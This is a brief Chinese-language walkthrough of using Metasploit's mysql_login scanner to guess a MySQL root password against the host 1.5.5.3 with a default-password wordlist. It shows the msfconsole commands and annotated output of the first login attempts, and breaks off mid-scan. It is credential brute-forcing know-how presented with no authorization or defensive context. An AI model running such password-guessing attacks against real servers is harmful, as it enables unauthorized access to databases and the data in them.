metasploit扫描MySQL用户名和密码

msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库[*] Rebuilding the module cache in the background...msf > db_status 查看数据库连接状态[*] postgresql connected to msf3
msf > use auxiliary/scanner/mysql/mysql_login 加载扫描模块msf auxiliary(mysql_login) > set RHOSTS 1.5.5.3 目标IP地址RHOSTS => 1.5.5.3msf auxiliary(mysql_login) > set USERNAME root 目标用户名 一般为rootUSERNAME => rootmsf auxiliary(mysql_login) > set PASS_FILE /pen/msf3/data/wordlists/postgres_default_pass.txt 密码字典路劲，路劲随意填写
PASS_FILE => /pen/msf3/data/wordlists/postgres_default_pass.txtmsf auxiliary(mysql_login) > exploit 开始扫描[*] 1.5.5.3:3306 MYSQL – Found remote MySQL version 5.5.16[*] 1.5.5.3:3306 MYSQL – [1/7] – Trying username:’root’ with password:”[*] 1.5.5.3:3306 MYSQL – [1/7] – failed to login as ‘root’ with password ”[*] 1.5.5.3:3306 MYSQL – [2/7] – Trying username:’root’ with password:’root’